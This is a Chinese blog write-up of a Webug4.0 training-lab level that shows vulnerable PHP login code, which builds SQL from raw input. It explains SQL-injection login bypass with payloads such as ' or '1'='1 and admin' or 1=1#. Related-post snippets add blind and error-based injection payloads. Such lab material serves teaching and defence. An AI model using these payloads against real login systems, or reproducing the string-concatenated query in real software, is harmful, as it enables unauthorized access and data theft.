Webug4.0靶场通关笔记08- 第11关万能密码登录(SQL注入漏洞)

最新推荐文章于 2025-05-02 20:53:08 发布
最新推荐文章于 2025-05-02 20:53:08 发布
阅读量871 收藏 19
点赞数 20
分类专栏: webug靶场 文章标签: 网络 web安全 webug靶场 SQL注入漏洞 万能密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/147653545
版权

目录

第13关 万能密码登录

1.打开靶场

2.源码分析

3.渗透方法1

4.渗透方法2

第13关 万能密码登录

本文通过《webug靶场第13关 万能密码登录》来进行渗透实战。

万能密码是利用 SQL 注入漏洞,构造出能够绕过登录验证的特殊密码字符串。通常,登录验证的 SQL 查询语句类似于SELECT * FROM users WHERE username = '$username' AND password = '$password'。攻击者通过输入特殊的密码,如' OR '1'='1',可以使 SQL 语句的条件永远为真,从而绕过验证,以任意用户的身份登录系统。

  • 危害:万能密码的主要危害是导致系统的登录验证机制失效,攻击者可以轻易地获取系统的访问权限,进而进行其他恶意操作,如窃取数据、篡改信息等。

为了防止 SQL 注入和万能密码攻击,开发人员应该对用户输入进行严格的验证和过滤,使用参数化查询或存储过程来避免将用户输入直接嵌入到 SQL 语句中,同时对数据库的权限进行合理的设置,限制用户对敏感数据的访问。

1.打开靶场

进入靶场的第11关,万能密码登录,网址如下所示。

http://192.168.71.1/webug4/control/sqlinject/universal_passwd.php

此时进入了登陆页面,需要输入用户名和密码,如下图所示。 

2.源码分析

对源码进行代码审计,如下为原始代码。

<?php

/**
 * payload 1' or 1=1 #
 */
require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}

if (isset($_POST["username"]) && isset($_POST['password'])) {
    if (!empty($_POST['username']) && !empty($_POST['password'])) {
        $username = $_POST['username'];
        $password = $_POST['password'];
        $sql = "SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'";
        $res = $dbConnect->query($sql);
        if (mysqli_num_rows($res) >=1 ){
            $s = "SELECT * FROM env_list WHERE envName LIKE '%万能密码登陆%'";
            $r = $dbConnect->query($s);
            $row = mysqli_fetch_assoc($r);
            echo "flag:  ".$row['envFlag'];die();
        }
    }
}
require_once TPMELATE."/universalpasswd.html";

这段代码实现了一个不安全的登录验证功能,主要逻辑包括:

  • 检查用户会话状态,未登录则跳转到登录页

  • 接收用户提交的username和password参数

  • 直接将用户输入拼接到SQL查询语句中验证凭据

  • 如果查询返回结果,则显示一个包含"万能密码登陆"相关flag的环境变量

经过分析,这段代码有多个安全漏洞,具体说明如下所示:

  • SQL注入漏洞:直接将用户输入拼接到SQL语句中,攻击者可以构造恶意输入如admin' -- 来绕过认证

  • 密码明文存储:代码显示密码是明文存储和比较的,不符合安全规范

  • 敏感信息暴露:直接输出flag等敏感信息

  • 缺乏错误处理:没有对数据库操作失败的情况进行处理

本关卡如果实现万能登陆,需要利用SQL注入漏洞,接下来对数据库相关代码进行注释解释。

// 检查是否提交了username和password参数
if (isset($_POST["username"]) && isset($_POST['password'])) {
    // 确认参数值不为空
    if (!empty($_POST['username']) && !empty($_POST['password'])) {
        // 获取用户输入的用户名和密码(未做任何过滤处理)
        $username = $_POST['username'];
        $password = $_POST['password'];
        
        // 危险操作:直接将用户输入拼接到SQL语句中(存在SQL注入漏洞)
        $sql = "SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'";
        
        // 执行SQL查询
        $res = $dbConnect->query($sql);
        
        // 检查是否查询到结果(只要匹配到1条及以上记录就通过验证)
        if (mysqli_num_rows($res) >=1 ){
            // 查询环境变量表中包含"万能密码登陆"的记录
            $s = "SELECT * FROM env_list WHERE envName LIKE '%万能密码登陆%'";
            $r = $dbConnect->query($s);
            
            // 获取查询结果
            $row = mysqli_fetch_assoc($r);
            
            // 直接输出flag(存在信息泄露风险)
            echo "flag:  ".$row['envFlag'];
            
            // 终止脚本执行
            die();
        }
    }
}

最关键的SQL源码如下所示,参数使用单引号闭合。

SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'

该代码存在严重的SQL注入漏洞,因为:

  1. 未过滤用户输入:直接将POST['username']和P​OST['username']和_POST['password']拼接到SQL语句中

  2. 未使用预处理语句:采用危险的字符串拼接方式构造SQL查询

  3. 错误信息暴露:认证失败时会暴露原始SQL语句结构

攻击者可以利用万能密码绕过登录验证:

username: 1' or 1=1 #
password: [任意值]

这会使SQL语句变为:

SELECT * FROM user WHERE username = '1' or 1=1 #' AND password = '[任意值]'

 其中#注释掉后续条件,or 1=1使查询总是返回真,从而绕过身份验证直接获取flag。

3.渗透方法1

 可以通过构造如下注入命令。

用户名 admin
密码   ' or '1'='1

传入参数后SQL语句如下所示。

SELECT * FROM user WHERE username = 'admin' AND password = '' or '1'='1'

此时相当于如下命令,可以绕过登陆限制直接形成注入命令。

 SELECT * FROM user WHERE username = 'admin'

根据分析,用户名和密码输入如下内容。

admin
' or '1'='1

登录成功后显示flag,渗透成功。

4.渗透方法2

由于SQL语句中的#和-- 是代表注释符, 可以通过构造如下注入命令,用户名输入万能注入语句' or 1=1#或者' or 1=1--  (注意--后面加上空格),密码随便输入。

用户名 admin' or 1=1#
密码   ljn
或者
用户名 admin' or 1=1-- 
密码   ljn

传入参数后SQL语句变为如下所示。

SELECT * FROM user WHERE username = 'admin'or 1=1# AND password = 'ljn'
SELECT * FROM user WHERE username = 'admin'or 1=1--  AND password = 'ljn'

此时相当于如下命令,可以绕过登陆限制直接形成注入命令

 SELECT * FROM user WHERE username = 'admin'

根据分析,用户名和密码输入如下内容。

admin' or 1=1#
ljn

或者如下内容。

admin' or 1=1-- 
ljn

 登录成功后显示flag,渗透成功。

webug4.0通关笔记---(第一天:布尔注入)
liver100day的博客
04-23 748
布尔注入 页面在执行sql语句后,只会显示两种结果,Tuer or False 也就意味着,它不需要报错,不需要知道准确的字段个数, 归根结底它只心一点: 我们的sql到底有没有被执行成功 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不
Webug4.0靶场通关笔记(第二天)--------延时注入和post注入
Yasso的博客
02-20 889
一、延时注入 延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应,当布尔注入不成功时,即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入。 1.先判断字段数 2.判断数据库(webug) ?id=1’ and if(substr(database(),1,1)=‘w’,1,sleep(5))%23 (判断数据库第一个字母是否为w,是的话页面正常,否则沉睡5秒) ?
Webug4.0靶场通关笔记13- 第22越权修改密码
最新发布
mooyuan的博客
05-02 942
本文通过《webug4.0靶场通关笔记13- 第22越权修改密码》来进行逻辑漏洞中的越权漏洞渗透实战。
Webug4.0靶场通关笔记09- 第12DOM型XSS和第13过滤型XSS
mooyuan的博客
05-02 345
本文通过《webug靶场第12 DOM型XSS和13 过滤型XSS》来进行渗透实战。
webug4.0靶场通关笔记
qq_47289634的博客
07-13 2187
这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的。打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样。
Webug4.0靶场通关笔记07- 第9反射XSS和第10存储XSS
mooyuan的博客
05-01 741
本系列为通过《Webug4.0靶场通关笔记》的渗透集合,本文为反射型和存储型XSS漏洞卡的渗透部分,通过对XSS卡源码的代码审计找到漏洞的真实原因,讲解XSS漏洞的原理并进行渗透实践。
Webug4.0通关笔记01-01 显错注入
mooyuan的博客
04-22 1014
SQL注入主要分析几个内容(1)闭合方式是什么?webug靶场的第01卡为字符型,闭合方式为单引号(2)注入类别是什么?这部分是普通的字符型GET注入,使用union法即可注入成功(3)是否过滤了键字?很明显通过源码,iwebsec的第01卡过滤没有进行任何过滤了解了如上信息就可以针对性使用union查询法进行SQL绕过渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的webug靶场01注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。t=P1C7。
webug4.0通关笔记----(第一天:显错注入
liver100day的博客
04-23 811
布尔注入 布尔盲注:根据注入信息返回true or fales 没有任何报错信息 非法的用户可根据返回的报错信息,获取到数据库的重要信息 开始注入 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度。 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不是数组的0开始 mid(str,pos,l
Webug4.0靶场通关笔记(第三天)--------过滤注入和宽字节注入
Yasso的博客
02-21 844
一、过滤注入 这一为过滤注入,我以为过滤了空格,百度说过滤了select,单独输select会报错。。。。。。。 那这就跟第四POST注入一样,还是搞吧,POST省略了,这个不能省了。。。。。 1.是否报错 加个单引号会报错 2.既然有报错,先判断列数 可以看出有两列,尝试报错注入 union select 1,database()# -------------但页面没有回显,所以不能用显错注入 再次尝试 and 1=1# 和 and 1=2# -----但无论对错,都没有回显 所
sqli-labs靶场(1-20)通关手册
m0_58168821的博客
07-03 1011
id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,32)),1) --+ --------爆出字段名。发现报错如上图,此时我们判断出,闭合方式中含有单引号,我们假设只有单引号,加上or 1=1 --+
机器人“跨协议对话”秘籍:EtherNet IP转PROFINET网应用实录
bjbxkj的博客
04-29 506
由于两种协议在通信标准和数据格式上存在差异,导致机器人手臂无法与现场的终端控制器直接通信,设备之间的数据交换无法顺利进行,严重影响了生产线的整体效率。通过该网的及时引入,我们避免了大规模设备改造带来的高昂成本和生产延误风险,显著提高了设备协作效率和生产线整体性能,获得了生产部门的一致认可。针对这一问题,我们工程师团队经过详细分析和现场测试,决定采用EtherNet/IP转PROFINET通信协议网(倍讯BX-606-EIP)来实现快速、稳定的协议转换。接受控制器主动发送的指令及数据请求。
Nginx核心功能——nginx代理
2401_88768957的博客
05-01 1061
主要作用是将客户端的请求转发给目标服务器,并将响应返回给客户端Nginx 的 正向代理 充当客户端的“中间人”,它赋予开发者精准控制URL的能力,让请求的流转不再受限于物理路径,而是通过逻辑规则灵活适配业务需求。Nginx的七层(应用层)反向代理基于HTTP/HTTPS 协议。Nginx的四层(网络)反向代理基于 TCP/UDP 协议,改成break标记,使用浏览器请求,
网络原理初识
2401_83526138的博客
04-29 525
物理层规定了网络通信中一些硬件设施(网线,光纤,WIFI)的要求。
指定的网络名不再可用0x00000040原因分析及解决方法
电脑技术分享网的博客
04-30 629
如:用户是属于修复别人共享给我的打印机(客户端)或前面两种都是的两个选项场景,勾选修复了【共享主机】更新补丁选项,则可能会出现打印机报错的情况。出现此类问题时,可再次点击重新扫描,找到其中的【共享主机】更新补丁进行还原,即可解决大部分别人共享给我的打印机常见错误修复。2、物理连接问题:如果使用的是网络打印机,确保打印机与网络的连接没有问题,比如网线连接正常,打印机的网络设置正确等。可快速扫描当前连接打印机需要的驱动,在扫描出的打印机驱动中可选择相打印机驱动版本进行修复安装。
吴恩达强化学习复盘(11)连续状态空间|深度Q网络
wgc2k的博客
04-28 1271
这是是一个能让用户在月球上着陆模拟飞行器的应用,它类似于一个被很多强化学习研究者使用的电子游戏。在这个应用中,用户的任务是在月球着陆器快速接近月球表面时,在适当的时间点燃推进器,使其安全降落在着陆台上。
ActiveMQ 性能优化与网络配置实战(一)
qq_42190530的博客
05-01 913
NIO 与 BIO 模型选择、协议优化(OpenWire/Stomp)、生产者限流与消费者预取策略。
SD - WAN 跨境网络专线部署方式介绍
seaarea_818的博客
04-30 339
以某企业为例,其在欧洲的分支机构只需将 CPE 设备接入现有的网络环境,通过简单的配置,就能快速与国内总部的网络建立安全、稳定的连接。管理员坐在总部的办公室里,通过控制器的管理界面,就能清晰地了解到欧洲分支网络的运行状态,包括每条链路的带宽使用情况、网络延迟等信息,并根据实际需求灵活调整网络策略。在部署 SD - WAN 跨境网络专线时,企业通常会在国内总部和欧洲分支机构分别部署 CPE设备,这一设备就像是连接企业网络与外部网络的智能桥梁。部署过程也较为便捷,企业无需进行大规模的网络改造工程。
局域网视频会议软件BeeWorks Meet
weixin_53855915的博客
04-29 458
视频会议是企业协作的重要工具,它可以支持日常会议、异地协作等内部沟通需求,节省时间和成本,在与合作伙伴沟通方面,视频会议能助力远程沟通、项目展示及商务谈判,提高合作效率。相比传统的公有云视频会议服务,私有化部署的视频会议系统在安全性、可控性、定制化和成本效益等方面具有显著优势,为企业内部使用提供了强大的支持。BeeWorks音视频会议系统支持多种类型的会议,如网络会议、在线培训、远程招聘等。提供全面的参会管理功能,如添加/删除参会人、控制发言、点名、举手、投票、签到等,方便会议组织者进行高效管理。
【计算机网络】DHCP——动态配置ip地址
2303_78135757的博客
04-29 698
DHCP 的作用:自动分配 IP 地址及其他网络配置,简化网络管理。 • 工作原理:通过 Discover → Offer → Request → ACK 四步完成 IP 分配。 • 键特性:IP 地址池、租期管理、续约机制、静态/动态分配。 • 适用场景:企业、家庭、公共场所 Wi-Fi、物联网等动态网络环境。 • 注意事项:需防范 DHCP 欺骗攻击,合理设置租期和排除地址。
webug4.0靶场通关越权修改密码
03-20
### Web 安全靶场 Webug 4.0 中越权修改密码的解决方案 在 Web 应用程序的安全测试中,“越权访问”是一种常见的漏洞,指的是未经授权的用户能够执行超出其权限范围的操作。对于 Webug 4.0 靶场中的越权修改密码场景,以下是详细的分析与解决方法。 #### 背景描述 在 Webug 4.0 的设计中,存在一种典型的越权行为模式:攻击者可以通过篡改 HTTP 请求参数(如 `id` 字段),从而冒充其他用户的身份并修改目标用户的密码[^4]。这种漏洞通常源于应用程序未对操作对象的有效性和当前登录用户的权限进行严格验证。 --- #### 技术原理剖析 越权漏洞的核心原因在于服务器端缺乏有效的身份校验机制。具体表现为以下几点: 1. **请求参数未经验证** 当前用户发送的请求可能携带了非法的目标用户 ID 参数(例如 `id=0` 表示管理员)。如果服务端仅依赖前端传递的数据而未进一步确认该数据的真实性,则可能导致越权。 2. **缺少细粒度授权控制** 如果应用未能区分不同角色之间的权限边界,就容易让低权限用户获得高权限功能的使用权。 3. **会话管理不当** 即使实现了基于会话的身份认证,但如果会话状态没有绑定到具体的资源访问上下文中,也可能引发类似的越权问题。 --- #### 解决方案实现 针对上述问题,可以从以下几个方面入手来修复此漏洞: ##### 1. 强化后端逻辑校验 每次接收到涉及敏感操作(如更改密码)的请求时,应强制核对该操作是否由合法主体发起。这可通过比较当前已登录账户的信息与待处理记录所属实体的一致性完成。例如,在 PHP 或 Python 后端代码中加入如下片段以确保只有本人能重置自己的密码: ```php <?php // 假设 $_SESSION['user_id'] 存储着当前登录者的唯一标识符 if ($_POST['target_user_id'] != $_SESSION['user_id']) { die('Access Denied'); // 若两者不符则拒绝继续运行后续脚本 } ?> ``` 或者采用更现代化的语言框架编写类似防护措施: ```python from flask import session, request, abort def change_password(): target_user_id = int(request.form.get('target_user_id')) current_user_id = session.get('user_id') if target_user_id != current_user_id: abort(403) # 返回HTTP Forbidden响应码表示无权访问 # 正常业务流程... ``` 以上两段伪代码均体现了只允许用户对自己账号实施特定变更的原则。 ##### 2. 实施严格的 RBAC (Role-Based Access Control) 引入基于角色的访问控制系统有助于细化各类人员所能触及的功能模块及其内部细节。通过预先定义好的策略组合判定谁可以在何时何地做什么事情,进而减少因疏忽造成的安全隐患。 例如,在 MySQL 数据库表结构层面增加字段用于标记每条记录联的角色类别,并据此调整查询语句条件部分的内容以便筛选出符合条件的结果集之前先过滤掉不符合要求的部分。 ##### 3. 利用 CSRF Token 提升安全性 为了防止恶意站点诱导受害者提交伪造跨站请求(CSRF),建议结合随机生成且难以预测的一次性令牌(Token)一同嵌入至 HTML 表单之中并与对应 Session 绑定起来共同参与最终判断过程。这样即使黑客截获到了原始 POST 请求也无法轻易复制粘贴成功模拟真实交互动作。 --- #### 总结说明 综上所述,要彻底杜绝此类越权现象的发生除了加强开发阶段的设计考量之外还需要持续注最新威胁情报动态及时修补发现的新缺陷。同时也要提醒广大开发者时刻牢记安全第一的理念贯穿整个软件开发生命周期始终。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值